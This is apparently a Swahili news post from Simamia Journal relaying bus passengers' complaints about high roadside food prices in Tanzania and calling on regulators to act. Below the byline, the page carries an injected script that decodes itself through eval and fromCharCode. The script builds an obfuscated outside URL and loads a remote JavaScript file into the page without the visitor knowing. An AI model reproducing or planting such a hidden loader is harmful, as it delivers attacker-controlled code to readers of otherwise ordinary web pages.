Recent Comments

KILIO CHA ABIRIA WA MABASI YAENDAYO MIKOANI KUHUSU GHARAMA ZA CHAKULA NJIANI NA UBORA HAFIFU

By Simamia Journal Jan 18, 2021
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

KILIO CHA ABIRIA WA MABASI YAENDAYO MIKOANI KUHUSU GHARAMA ZA CHAKULA NJIANI NA UBORA HAFIFU.

LameckJK -(eds.)

Nimeitoa sehemu ( na marekebisho kidogo ya lugha).

 

Ni mojawapo ya changamoto kubwa sana  kwa abiria wanaosafiri kwa mabasi: Mamlaka zinazohusika na  Sera za Ushindani wa biashara na ulinzi kwa walaji

Competition &consumer protection policy) waliangalie hili. Hapa kuna maswala 2 ya baraka haraka kisheria: Swala la ushindani linaloshabihiana na bei ( price fixing) na pia athari kwa walaji consumer

NB: picha ?haihusiani Na tukio.

 

“Serikali yetu hebu tusaidie wanyonge na hii tabia inazidi shamiri sana kwa wale ndg zetu wanao safiri mikoa ya mbali #Dar_to_mwnza, #Dar_to_mbya, #Dar_to_kgma, #Dar_to_Arusha  n.k

Kuna tabia na utaratibu wa mabasi walio jiwekea bila kuhofia abiria wao na sio rafiki kabisa wanapaki mabasi yao sehemu ya chakula bei zao ziko juu bila kujali abiria wao mifukoni  mwao kuko vipi chakula cha kawaida sna unakuta elfu 7 elfu  8 na kuendelea wakati hicho chakula hakina hadhi ya kuuzwa bei hiyo alafu kidogo sana wanadhani kila mtu anapesa ya kumudu hiyo bei?

 

‘Jana nilikuwa natoka Arusha kuja dar tulipo fika sehem ya chakula nilitamani kulia niliongozana na mama mmoja mwenye watoto wa 3 alivyo ambiwa chakula cha bei ya mwisho ni elfu 7 alikuwa mnyonge sana na alikuwa na elfu 5 tu ikambidi anunue soda na biscuit roho iliniuma sana’

 

Sisi ombi letu niserikali itoe sheria kwa mabasi yote yawe yana simama kwenye mji ulio na huduma kwa wote sio kutupeleka maeneo ambayo wana masilahi nayo inaumiza sana.

 

Tusambaze hii kwa ma group mengi tusikike Kwa tetesi nilizo sikia dereva akipeleka bas sehem ya hotel hupata huduma ya chakula bure yeye na watumish wote wa gari na posho wanapewa kwa week au mwezi sasa wenye maslahi yao yatutese abiria? Tupaze sauti kwa viongozi #Wabunge na viongozi wote wa juu kuwa  hii ni 2021 #Tumestuka

By Simamia Journal

Tangaza nasi. www.simamia.com YouTube Chanel: www.youtube.com/c/SimamiaTv